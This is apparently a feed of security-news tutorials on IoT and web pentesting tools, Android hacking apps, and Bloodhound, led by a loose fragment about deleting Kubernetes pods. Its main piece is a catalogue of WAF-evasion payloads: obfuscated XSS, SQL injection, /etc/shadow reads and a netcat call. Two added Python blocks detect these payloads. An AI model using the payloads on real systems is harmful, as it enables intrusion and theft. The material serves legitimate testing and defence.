For example, this command will generate a list of commands to delete all pods that use a non-default service account. I recommend starting with the kube-system namespace, where kube-proxy and the CNI plugin are installed; these are vital for your microservices to communicate.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

How to do penetration testing of IoT devices easily https://www.securitynewspaper.com/2021/11/09/how-to-do-penetration-testing-of-iot-devices-easily/ Tue, 09 Nov 2021 23:29:02 +0000

The Internet of Things (IoT) is probably one of the most widely used technological concepts in recent times, as it has implementations in all kinds of environments, from complex industrial processes to domestic use. According to pentesting specialists, IoT architecture can be divided into 3 layers: hardware, communication or network and interfaces or services. In other words, the three elements that make up an IoT system are hardware, protocols, and communication services.

According to the specialists of the International Institute of Cyber Security (IICS), one of the most recent security threats is related to IoT devices, as malicious hacking groups have realized that these devices do not have the best security measures, which makes them easy and highly usable targets for launching subsequent attacks, including botnet recruitment, malware distribution, and denial of service (DoS) attacks.

The ease with which these attacks are launched has forced the cybersecurity community and pentesting specialists to find the best ways to prevent the compromise of these devices, something especially complicated considering the variety of IoT infrastructures, operating systems and firmware versions. However, there are options to strengthen the security of these networks in a practical way.

IoT-PT is a pentesting virtual machine designed specifically for IoT devices. It bundles IoT exploitation frameworks, Bluetooth hacking tools, firmware reverse engineering tools (automated and dynamic), iOS/APK application analysis tools and network security tools. The tool is available on GitHub.

According to pentesting experts, the following list shows all the tools included in IoT-PT:

Before concluding, we remind you that this article was prepared for informational purposes and should not be taken as a call to action. IICS is not responsible for any misuse of the information contained herein. Remember that pentesting must be carried out for legitimate purposes and with the prior consent of the administrators of the analyzed system.

OWTF penetration testing framework combines OWASP Top 10, PTES and NIST https://www.securitynewspaper.com/2021/11/03/owtf-penetration-testing-framework-combines-owasp-top-10-ptes-and-nist/ Wed, 03 Nov 2021 22:17:18 +0000

Offensive Web Testing Framework (OWTF) is an Open Web Application Security Project (OWASP) development focused on making penetration testing more efficient and aligning security testing with recognized standards such as the OWASP Testing Guide (v3 and v4), the OWASP Top 10, the National Institute of Standards and Technology (NIST) and the Penetration Testing Execution Standard (PTES), so that pentesters have more time for tasks such as:

  • Find, verify, and combine vulnerabilities in an efficient way
  • Have more time to investigate complex vulnerabilities such as business logic, architectural flaws, or virtual hosting sessions
  • Demonstrate a true impact despite the short periods of time normally given to test vulnerabilities

The tool is highly customizable and anyone can create simple plugins or add new tests in the configuration files without having development experience. Nonetheless, this tool is not a full security solution and will only be as good as the pentester using it, as it will require understanding and experience to correctly interpret the result of the tool and decide what to investigate further to demonstrate the impact.

According to pentesting specialists, OWTF main features include:

  • Resiliency: If a tool happens to fail, OWTF moves on to the next tool/test, saving the partial output the tool produced before it crashed
  • Test separation: OWTF separates the traffic sent to the target into three main plugin types:
    • Passive: no traffic is sent to the target
    • Semi-passive: normal traffic to the target
    • Active: direct vulnerability probing
  • Web interface: Easily manage large penetration testing engagements
  • Interactive reports
  • Automated plugin rankings derived from the tool output, fully configurable by the user
  • Configurable risk rankings

The tool is available through the official OWASP platforms.

How to hack and bypass a web application firewall WAF during penetrating testing https://www.securitynewspaper.com/2021/09/16/how-to-hack-and-bypass-a-web-application-firewall-waf-during-penetrating-testing/ Thu, 16 Sep 2021 13:18:11 +0000

The term web application firewall (WAF) refers to a set of monitoring tools and filters designed to detect and block network attacks against a specific web application. According to pentesting experts at the International Institute of Cyber Security (IICS), these are security tools that, in real time, decide whether to allow or deny access to an online deployment.

Like any other security solution, a WAF is only a complementary solution for a comprehensive security environment, so it must be implemented along with other elements such as incident monitoring tools or anti-fraud systems.

A pentesting process against a WAF allows researchers to determine the real IP address of the target and, at later stages, try to evade this protection mechanism. The WAF compromise allows researchers (and also hackers) to know what’s behind these implementations.

Pentesting experts consider that nearly 50% of WAF implementations are vulnerable to one or more evasion methods, as hackers have made great strides in attack variants against these solutions, primarily by delivering malicious payloads disguised as legitimate software.

On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual, we remind you that this article was prepared for informational purposes only, so IICS is not responsible for any misuse of the information contained herein.

HOW TO DETECT A WAF?

There is a general process for finding the actual IP of a target website:

  • Employ shodan.io or censys.io
  • Search SPF records and TXT records
  • SPF and TXT records can reveal the IP address of the entry point that does not go through CloudFlare
  • You can also check the historical data on securitytrails.com, which can show the original IP in old records

To determine whether a WAF is present and how it is configured, pentesting experts recommend relying on the following indicators:

  • A WAF uses standard ports 80, 443, 8000, 8008, 8080, and 8088
  • A WAF sets its own cookies on requests
  • A WAF is associated with individual headers
  • A WAF responds with unique response codes to malicious requests

To verify the proper configuration of these devices, experts can:

  • Send a standard GET request from the browser, intercept it and note the response headers
  • Send a request from the command line (for example with cURL) and then check the content and headers of the response
  • Send GET requests to random open ports and look for banners that can reveal the WAF vendor
  • Try some SQL injection payloads like: “o1 =1 – to try to log in
  • Use XSS payloads such as <script>confirm() </script> in some input fields
  • Add .. /.. /.. /etc/passwd to a random parameter in the URL
  • Add a payload like ‘OR SLEEP(5)OR’ to the end of URLs for any random parameter
  • Send GET requests with legacy protocols such as HTTP/0.9 (HTTP/0.9 does not support POST requests)
  • Check the Server header to see the different types of interactions
  • Send raw FIN and RST packets to the server and observe the response

WAF HACKING TOOLS

Most hackers use automated tools to speed up web application firewall evasion processes. Below is a small list of the most popular tools for these activities; its use is only the first step in verifying how much information an attacker will be able to access.

  • w3af: A framework for auditing and attacking web applications
  • wafw00f: Tool to fingerprint and identify the WAF product in front of a site
  • BypassWAF: Used to evade these security mechanisms using DNS history; this tool searches old DNS records and checks whether the server still responds for the domain
  • CloudFail: A tactical reconnaissance tool that attempts to find the original IP address behind Cloudflare’s WAF

There are many other tools, but pentesting experts claim that these are the most popular.

WAF EVASION

Below we will review some of the best known WAF bypassing techniques.

Case switch technique

It consists of mixing uppercase and lowercase characters.

Basic request payload:

<ScrIpT>confirm()</sCRiPt>

Bypassing technique:

<ScrIpT>confirm()</sCRiPt>

Basic request:

SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'

Bypassing technique:

sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'

Example in URL:

http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4

URL encoding technique

Pentesting experts can also modify a normal payload with URL (percent) encoding. For this technique you can use Burp Suite, which has a built-in encoding and decoding tool.

WAF-blocked payload:

<Svg/x=">"/OnLoAD=confirm()/

Bypassing technique:

%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F

WAF-blocked payload:

UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)

Bypassing technique:

UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29

Example in URL:

https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

Unicode technique

Unicode encodings of characters give us an excellent way to evade a WAF. Encode the entire payload or just one fragment for satisfactory results.

Basic request:

<check onstart=prompt()>

Obfuscation:

<check onstart=pru06fmpt() >

WAF-blocked code:

/?redir=http://google.com

Bypassing technique:

/?redir=http://google。 com (Unicode)

WAF-blocked code:

<check loop=1 onfinish=alert()>x

Bypassing technique:

<check loop=1 onfinish=alert(1)>x (Unicode)

Basic request:

.. /.. /etc/shadow

Obfuscation:

%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow

HTML presentation

According to pentesting experts, web applications encode special characters in HTML and render them back when displaying; the basic cross-site cases below use numeric and named HTML entity encoding, respectively.

Basic request:

"><img src=x onerror=confirm()>

Encoded payload:

&quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt;

Encoded payload:

"><img src=x onerror=confirm()>

Mixed coding techniques

WAF rules tend to filter one particular type of encoding. Such filters can be bypassed with a payload that combines encodings, uses newlines and tabs, and adds further obfuscation.

Obfuscated payload:

<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>

Comment technique

Hackers often hide standard payload vectors in code comments, pentesting experts mention. Different payloads have different obfuscation methods.

WAF-blocked code:

<script>confirm()</script>

WAF Evasion:

<!--><script>confirm/**/()/**/</script>

WAF-blocked code:

/?id=1+union+select+1,2—

WAF Evasion:

/?id=1+un/**/ion+sel/**/ect+1,2—

Attackers can also insert comments in the middle of the attack lines. For example, /*! SELECT */ can be ignored by the WAF implementation, but passed to the target application and executed by the MySQL database.

Example in URL:

index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

Example in URL:

index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3

Double encoding method

WAF filters typically encode characters to protect a web application. Poorly designed filters can be evaded with relative ease using double encoding, say pentesting experts.

Basic request:

http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:

Obfuscated payload:

http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:

Basic request:

<script>confirm()</script>

Obfuscated payload:

%253Cscript%253Econfirm()%253C%252Fscript%253E

Template obfuscation

Several command-line utilities use wildcard patterns (globbing) to work with multiple files at once. These patterns can be used to spell out system commands.

Basic request:

/bin/cat /etc/passwd

Obfuscated payload:

/??? /?? t /??? /?? ff??

Characters used:

/ ? t s

Basic requests:

/bin/nc 127.0.0.1 443

Obfuscated payload:

/??? /n? 2130706433 443

Characters used:

/ ? n [0-9]

Dynamic loading technique

Programming languages have different syntax and patterns for string concatenation. According to pentesting experts, this allows you to create payloads that can evade various filters and rules.

Basic request:

<script>confirm()</script>

Obfuscated payload:

<script>eval('con'+'fi'+'rm()')</script>

Basic request:

/bin/cat /etc/shadow

Obfuscated payload:

/bi'n'''/c''at' /e'tc'/sh''ad'ow

Bash allows the concatenation of paths for execution.

Basic request:

<iframe/onload='this["src"]="javascript:confirm()"';>

Obfuscated payload:

<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:con"+"fir"+"m()"';>

Junk character technique

Simple payloads like these are easily filtered by a WAF. In some cases, adding some junk characters helps avoid detection, allowing pentesting experts to confuse regular-expression-based firewalls.

Basic request:

<script>confirm()</script>

Obfuscated payload:

<script>+-+-1-+-+confirm() </script>

Basic request:

<BODY onload=confirm()>

Obfuscated payload:

<BODY onload!#$%&()*~+-_.,:;? @[/|]^'=confirm()>

Basic request:

<a href=javascript;alert()> ClickMe

WAF Evasion:

<aa aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

Line break technique

Many regex-based WAFs block repeated attempts effectively. The line break technique (CR and LF) can break the firewall’s regular expression and bypass the security measures.

Basic request:

<iframe src=javascript:confirm(hacker)">

Obfuscated payload:

<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hacker)">

Invalid uninitialized variable technique

Regular expression filters can be bypassed by using uninitialized bash variables. Such a variable expands to an empty string, so the command itself is unchanged. Bash and Perl both allow this.

  • First-level obfuscation: Normal

Basic request:

/bin/cat /etc/shadow

Obfuscated payload:

/bin/cat$u /etc/shadow$u

  • Second-level obfuscation: Position-based

Basic request:

/bin/cat /etc/shadow

Obfuscated payload:

$u/bin$u/cat$u $u/etc$u/shadow$u

  • Third-level obfuscation: Random characters

Basic request:

/bin/cat /etc/passwd

Obfuscated payload:

$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff

Tabs and line break

Tabs are often used to bypass firewalls, especially those based on regular expressions. Tabs can help break a WAF regular expression when the regular expression expects spaces instead of tabs.

Basic request:

<IMG SRC="javascript:confirm();">

Bypassing technique:

<IMG SRC=" javascript:confirm();">

Variant:

<IMG SRC=" jav ascri pt:confirm ();">

Basic request:

http://test.com/test?id=1 union select 1,2,3

Bypassing technique:

http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

Basic request:

<iframe src=javascript:confirm()></iframe>

Obfuscated payload:

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:c&Tab;o&Tab;n&Tab;f&Tab;i&Tab;r&Tab;m&Tab;%28&Tab;%29></iframe>

Token Breakers

Token attacks try to break the logic a WAF uses to split a request into tokens, pentesting experts say. Token breakers are characters that alter the correspondence between a part of the string and a particular token. The request must remain valid after the token breakers are applied.

Our payload:

?id='-sqlite_version() UNION SELECT passwords FROM users –

Example: unknown context for the pentester.

First payload:

?id=12);D ROP TABLE users –

Second payload:

?id=133) INTO OUTFILE 'xxx' –

Obfuscation technique in other formats

Many web applications support different types of encoding and can interpret them. We need to obfuscate the payload in a format that the WAF does not understand but that the server still decodes and forwards.

IIS case:

IIS 6, 7.5, 8 and 10 can interpret parameters encoded as IBM037 (EBCDIC).

Send parameters encoded with:

  • Original request:

POST /example.aspx?id7=sometext HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 27

id2='union all select * from users—

  • Obfuscated request with URL encoding:

POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 127

%89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99
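As an added example (not from the original article), the defensive counterpart of the techniques above: a request normalizer that undoes percent and double encoding, overlong UTF-8, the declared charset (the IBM037 case), HTML entities, JavaScript escapes, IDNA full stops, SQL comments, string concatenation, whitespace and case tricks before a rule set is matched. The rule set, the charset handling and the sample requests are assumptions constructed for this demo.

```python
"""Added example (not from the article): normalize a request fragment so that
one small rule set sees through the obfuscation layers described above. The
rules and sample requests are constructed for this demo."""
import codecs
import html
import re
import unicodedata
import urllib.parse

MAX_DECODE_ROUNDS = 3   # enough to undo the double encoding shown above

# Overlong two-byte UTF-8 (lead byte 0xC0/0xC1) is rejected by strict decoders
# but accepted by some servers; fold it to the byte it actually encodes.
_OVERLONG = re.compile(rb"([\xc0\xc1])([\x80-\xbf])")

# Ideographic / fullwidth full stops that IDNA maps to "." in host names.
_IDNA_DOTS = {0x3002: ".", 0xFF0E: ".", 0xFF61: "."}


def percent_decode(raw, charset="utf-8"):
    """Undo URL encoding (repeatedly, for double encoding) and decode the
    resulting bytes in the charset the request declared."""
    data = raw.replace("+", " ").encode("utf-8")
    if codecs.lookup(charset).name != "utf-8":
        # The IBM037 case above: one round, decoded as the declared EBCDIC charset.
        return urllib.parse.unquote_to_bytes(data).decode(charset, "replace")
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = urllib.parse.unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    data = _OVERLONG.sub(
        lambda m: bytes([((m.group(1)[0] & 0x1F) << 6) | (m.group(2)[0] & 0x3F)]), data)
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return data.decode("latin-1")          # e.g. a bare %a0 used as MySQL whitespace


def _js_escapes(s):
    """Decode \\uXXXX and \\xXX escapes, as used in the Unicode technique."""
    s = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def normalize(raw, charset="utf-8"):
    """Collapse the encoding, comment, concatenation, whitespace and case
    tricks into one canonical lower-case string."""
    s = percent_decode(raw, charset)
    s = html.unescape(s)                                  # &quot; &lpar; &Tab; &#97 ...
    s = _js_escapes(s)
    s = unicodedata.normalize("NFKC", s).translate(_IDNA_DOTS)
    s = re.sub(r"/\*!(.*?)\*/", r"\1", s, flags=re.S)    # MySQL executes /*! ... */
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)          # /**/ dropped so split keywords rejoin
    s = re.sub(r"""(['"])\s*\+?\s*\1""", "", s)          # 'con'+'fi'+'rm' -> 'confirm'
    s = re.sub(r"\s+", " ", s)                            # CR, LF, TAB, NBSP -> one space
    return s.lower()


# Illustrative rules only. They run on the normalized text and use \s* at the
# seam so that "un/**/ion sel/**/ect" and "union%a0select" both land on them.
RULES = {
    "sqli-union-select": re.compile(r"\bunion(?:\s+all)?\s*select\b"),
    "xss-script-tag":    re.compile(r"<\s*script\b"),
    "xss-event-handler": re.compile(r"\bon[a-z]+\s*="),
    "xss-js-uri":        re.compile(r"j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:"),
    "path-traversal":    re.compile(r"\.\./|/etc/(?:passwd|shadow)\b"),
}


def inspect(raw, charset="utf-8"):
    """Return (normalized text, names of the rules that match it)."""
    text = normalize(raw, charset)
    return text, [name for name, rx in RULES.items() if rx.search(text)]


# Constructed sample body for the IBM037 case above (the article's own hex is not reused).
EBCDIC_BODY = "".join(f"%{b:02X}" for b in "id2='union all select * from users".encode("ibm037"))

SAMPLES = [  # (request fragment, declared charset), built from the techniques above
    ("/index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4", "utf-8"),
    ("/?id=1+un/**/ion+sel/**/ect+1,2--", "utf-8"),
    ("%253Cscript%253Econfirm()%253C%252Fscript%253E", "utf-8"),
    ('<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hacker)">', "utf-8"),
    ('<iframe/onload=\'this["src"]="jav"+"as&Tab;cr"+"ipt:con"+"fir"+"m()"\';>', "utf-8"),
    ("/?file=%C0%AE%C0%AE%C0%AFetc%C0%AFpasswd", "utf-8"),
    ("/?redir=http://google\u3002com", "utf-8"),
    (EBCDIC_BODY, "ibm037"),
]

if __name__ == "__main__":
    for raw, charset in SAMPLES:
        text, hits = inspect(raw, charset)
        print(f"{', '.join(hits) or '-':35} {text}")
```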

Finally, pentesting experts offer a number of useful tips for these security tests:

  • Always try to address the problem as comprehensively as possible
  • Try different encoding techniques. Depending on the case, some may work better than others
  • Take the time to verify your DNS records, as only then will you be able to find errors successfully
  • Don’t forget that any protection on web resources can be bypassed and WAF is not a panacea for all the problems faced by an online application
  • Hackers don’t rest and are always looking for new methods to take control of affected resources, so the cybersecurity community can’t rest either

For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses, feel free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.

Top 15 hacking tools for doing penetration testing from mobile phones https://www.securitynewspaper.com/2021/07/08/top-15-hacking-tools-for-doing-penetration-testing-from-mobile-phones/ Thu, 08 Jul 2021 22:44:00 +0000

Pentesting has become one of the main practices of the cybersecurity community and even represents an important source of income for independent researchers and security firms. The most advanced security audits are typically performed on Kali Linux computers with specific hardware requirements, although some scanning processes can be performed using a conventional smartphone or tablet.

In this article, pentesting specialists from the International Institute of Cyber Security (IICS) will show you the best 14 apps to perform basic security scans from a mobile device running Android operating system. It is important to note that it is possible to perform some hacking tasks from our smartphone; we only have to learn to distinguish between the really useful tools and the junk apps that abound on platforms like Google Play Store.

HACKING VIA SMARTPHONE TOOLS

Pentesting experts classify hacking apps for Android into the following categories:

  • Web resource scanners: These are hacking tools to find vulnerabilities in web applications
  • Combinations: Allow users to search for hardware and software vulnerabilities in order to exploit them. These tools let you carry out sniffing attacks, Man-in-The-Middle (MiTM) attacks and other hacking variants
  • Trackers: These are hacking apps to intercept and analyze target user’s traffic
  • Help utilities: Support tools during pentesting
  • Directories and search engines: Applications that perform auxiliary functions

Let’s look at some good examples of these tools.

WEB RESOURCE SCANNERS FOR ANDROID

Web application scanners are probably the most important mobile hacking resource, as pentesting experts note. Here are three applications that let you find open admin panels and password reset pages, and test any website for XSS vulnerabilities, SQL injection possibilities, directory listing, and more.

Kayra the Pentester Lite

Kayra the Pentester Lite is a vulnerability scanner to analyze the configurations of a specific web server that attempts to obtain a list of directories and includes additional tools, such as hashing generators and AES decryptors, as mentioned by pentesting experts.

The application has simple and direct configurations. It supports HTTPS and validates TLS, plus it is capable of searching for XSS, brute force flaws and performing dictionary attacks. It can work in the background and in multithreaded mode. It contains the Google Hacks database and automatically detects known vulnerabilities. The free version is quite functional, but if you want to get rid of the ads the paid version is accessible. The latest version of Kayra the Pentester Lite (v1.4.0) requires only 4.7 MB and works on any Android 4 device without rooting.

DroidSQLi

DroidSQLi allows you to verify websites for SQL injection vulnerabilities in different variants:

  • Normal SQL Injection: The classic version, passing a UNION ALL SELECT parameter
  • Error-based SQL injection: Conscious use of incorrect query syntax to receive an error message that reveals additional database parameters
  • Blind SQL Injection: A series of queries that analyze true or false DBMS responses, allowing you to restore the database structure
  • Time-based SQL injection: the formation of additional queries that cause the DBMS to be suspended for a certain period of time, making it possible to retrieve the data character by character

This utility automatically selects the injection method and also uses techniques to bypass query filtering. To start testing the site, you must manually find the entry point. Typically, this is the address of a web page that contains a query parameter such as id=x or p=x, where x is a positive integer. In our example, the payload of the id parameter looks like this:

id=(SELECT 4777 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4777=4777,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

There are many websites that are vulnerable to SQL injection and it is best to find these flaws through a browser search.

This utility does not require a rooted smartphone and works on all Android versions later than 5.2.
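The four variants listed above leave different fingerprints in a web server's access log. As an added example (not the article's or DroidSQLi's code, and my own heuristics rather than the app's detection logic), this Python snippet decodes the `id` parameter of request lines and labels each value with the variant it resembles; the request lines are constructed, and the third one carries the payload quoted above.

```python
"""Label the `id` parameter of HTTP request lines with the SQL injection
variant it resembles (union, error-based, boolean-blind, time-based)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Ordered fingerprints: the first match wins, so the most specific variants
# (time-based, then error-based) are tested before the generic ones. The
# error-based rule matches the FLOOR(RAND(0)*2) ... GROUP BY trick used in
# the payload quoted above.
RULES = [
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)),
    ("error-based", re.compile(r"\bFLOOR\s*\(\s*RAND\s*\(|\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean-blind", re.compile(r"\b(AND|OR)\s+\S+\s*(=|<|>|LIKE)\s*\S+", re.I)),
]


def normalise(value, rounds=3):
    """Undo (possibly repeated) URL encoding and strip /* */ comment padding."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()


def classify(value):
    """Return the variant name, or None for a benign-looking value."""
    text = normalise(value)
    if re.fullmatch(r"\d+", text):   # a plain integer id: nothing to flag
        return None
    for label, pattern in RULES:
        if pattern.search(text):
            return label
    return None


def scan_request_lines(lines, param="id"):
    """Return (decoded value, label) for each `param` value in request lines
    of the form 'GET /path?query HTTP/1.1'."""
    results = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        query = urlsplit(parts[1]).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            results.append((normalise(value), classify(value)))
    return results


# Constructed request lines (not real traffic); the third one carries the
# payload quoted in the text, the others one of the remaining variants.
SAMPLE_REQUESTS = [
    "GET /item.php?id=42 HTTP/1.1",
    "GET /item.php?id=1+UNION+ALL+SELECT+user,password,3+FROM+users-- HTTP/1.1",
    "GET /item.php?id=(SELECT%204777%20FROM(SELECT%20COUNT(*),CONCAT(0x71626b6a71,"
    "(SELECT%20(ELT(4777=4777,1))),0x7170767871,FLOOR(RAND(0)*2))x%20FROM%20"
    "INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1",
    "GET /item.php?id=7%20AND%201=1 HTTP/1.1",
    "GET /item.php?id=7%20AND%20SLEEP(5)-- HTTP/1.1",
]

if __name__ == "__main__":
    for value, label in scan_request_lines(SAMPLE_REQUESTS):
        print(f"{label or 'benign':14} {value[:60]}")
```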

Droidbug Admin Panel Finder FREE

This application searches for administration panels at the default paths used by different CMSs. The results do not always reflect the real state of affairs, since popular web servers have IDS and WAF installed and better security mechanisms overall.

Still, on less popular sites with weaker security measures the picture is grim, and you will find a valid admin panel in a matter of seconds. The paid version removes ads and unlocks brute-force attacks in a mixed pattern for sites with PHP/ASP/CGI/CFM/JS support.

The latest version of Droidbug Admin Panel Finder FREE needs only 6.4 MB and does not require rooted devices.

COMBINATIONS TO HACK FROM A SMARTPHONE

The Internet isn’t just about web applications. The following collection of hacking apps for Android will allow you to search for vulnerabilities in software and hardware, perform sniffing and MiTM attacks, work with backdoors, and more.

cSploit

This is one of the most powerful tools for scanning networks and finding vulnerabilities on detected hosts. Experts can use cSploit to draw a network map and find information about all connected devices.

The tool can also determine a host’s IP/MAC address and vendor, identify its operating system, look for vulnerabilities using the Metasploit RPCd framework, and obtain passwords using brute force.

The latest version (v1.6.6 RC2) requires 3.5 MB and works on all Android versions later than 2.3, although it should be noted that cSploit requires a rooted device to properly work.

dSploit

While cSploit worked smoothly for me, the last three versions of dSploit failed with an error almost immediately after release. Since developer Simone Margaritelli got a job at Zimperium, dSploit’s developments have become part of the proprietary zANTI utility.

This utility requires a rooted Android device to work properly.

zANTI

This is a mobile pentesting app developed by Zimperium whose interface is divided into two parts: Scanning and Man-in-The-Middle (MiTM). A separate function allows users to identify vulnerabilities in the pentesters’ own smartphone.

This tool helps researchers to hack routers and get full access to them. Using MiTM attacks, zAnti detects unsecured items at three levels: in the operating system, applications, and device settings.

Finally, the tool prepares a report that contains explanations and tips on how to eliminate the detected flaws. Like other tools in this list, zANTI requires a rooted device.

SNIFFERS TO INTERCEPT TRAFFIC ON ANDROID

No pentester can do without good sniffer software, pentesting experts mention. Therefore, the next section of the article is dedicated to applications for intercepting and analyzing target user traffic.

Intercepter-NG

This is an advanced sniffer for MiTM attacks. Intercepter-NG captures traffic and analyzes it on the fly, automatically detecting any authorization data it contains.

The data formats the tool detects automatically include passwords and hashes for the following protocols: AIM, BNC, CVS, DC++, FTP, HTTP, ICQ, IMAP, IRC, KRB5, LDAP, MRA, MYSQL, NTLM, ORACLE, POP3, RADIUS, SMTP, SOCKS, Telnet, and VNC.

This app works on any Android device after v2.3, although it is important to mention that a rooted device is required, as mentioned by pentesting experts.

Packet Capture

This is a simple and legal TCP/UDP packet analyzer that can also intercept HTTPS sessions via MiTM. It does not require root rights because it uses Android’s built-in VPN feature to route traffic through itself and forges an SSL certificate.

Packet Capture works locally and does not perform ARP spoofing, session hijacking, or other attacks on external hosts. The application is positioned as a debugging proxy and can be downloaded from official sources.

HELP UTILITIES

While advanced pentesting utilities require rooted devices and other tools, there are simpler apps available in the Play Store that work on any smartphone, pentesting experts mentioned.

WPSapp

This program scans for WPS-enabled access points. After finding them, it tries the default PINs on them; there are only a few of these, and they are known from router manufacturers’ manuals.

If the user has not changed the default PIN and has not turned off WPS, the utility will go through all known values and obtain the WPA(2)-PSK, no matter how long and complex it is. The wireless password is displayed on the screen and automatically saved in the WiFi settings of the attacking smartphone.

This tool works on all versions of Android after 5.1 and, although it does not strictly require a rooted device, it works better with root access.

WiFiAnalyzer

This is a free and open-source WiFi scanner that is very useful for detecting access points, viewing their parameters, and measuring signal strength and the distance to the different WiFi points.

WiFiAnalyzer allows you to view the connection status and filter targets by signal strength, SSID, frequency band (2.4/5 GHz) and encryption type. You can also determine the least congested channel manually using the available graphs, as mentioned by pentesting specialists. The tool does not require a rooted device and works on any version of Android above v4.1.

Fing

Fing is a tool available on the Google Play Store to perform quick scans of the WiFi network to which our device is connected, identifying all users connected to this access point. Although the main use of this tool is to analyze our own WiFi network, Fing has other very attractive options.

Its Premium version can perform advanced analysis of NetBIOS, UPnP and Bonjour names, so you can fully identify the types of devices connected to a network; it also has built-in ping and traceroute utilities and can send Wake on LAN (WOL) requests, cybersecurity experts mention.

As it is an application available on official platforms, users do not require a rooted device to access all Fing features.

NetCut

This app detects all devices connected to a wireless network and uses advanced mechanisms to kick intruding devices off the network, or even to restrict their access to the administrator’s WiFi network entirely.

The app takes only 12 MB and works on any version above 4.0, although a rooted device is required.

DIRECTORIES AND SEARCH ENGINES FOR PENTESTING

Finally, we’ll address a couple of utilities that, while not directly related to hacking activities, perform helper functions to develop this kind of testing.

Droidbug Exploiting FREE

This utility was designed to find and download various types of exploits, grouped into two categories: local execution and remote execution. A separate group includes hardware and web vulnerabilities, as well as those used in denial of service (DoS) attacks.

This tool can be run by any version of Android greater than 4.0.3, although its execution requires a rooted device.

Pentest Cheatsheet

According to pentesting specialists, this is a complete guide to running security tests according to The Open Web Application Security Project (OWASP) guidelines.

This guide includes a selection of links to hacking utilities, tested and grouped according to the task in question, be it online scanning, vulnerability analysis, reversing tools, fuzzers, sniffers, and others. This utility weighs only 2.2 MB and works on all Android versions greater than 4.0, and no rooted device is required.

Remember that this material was developed for entirely academic purposes, so its misuse is not the responsibility of IICS. To learn more about computer security risks, malware, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) website.

The post Top 15 hacking tools for doing penetration testing from mobile phones appeared first on Information Security Newspaper | Hacking News.

How to pentest an Active Directory server? https://www.securitynewspaper.com/2021/05/07/how-to-pentest-an-active-directory-server/ Fri, 07 May 2021 17:07:10 +0000

Bloodhound is a great visual tool that shows the relationship between multiple Active Directory objects and allows you to quickly evaluate the possibility of compromising relevant information, as well as identify potential security weaknesses. The best thing about this tool is that it is practically ready to use after installation, so no complicated startup configurations are required.

Below, pentesting specialists from the International Institute of Cyber Security (IICS) will show you everything you need to know about using Bloodhound.

Installation

For this step, a stock installation of Kali Linux is recommended. Enter the following command:

$ sudo apt install bloodhound

After the installation is complete, start the neo4j console. This step should work without problems if the system is connected to the Internet and the repositories are configured correctly, as mentioned by pentesting experts:

$ sudo neo4j console

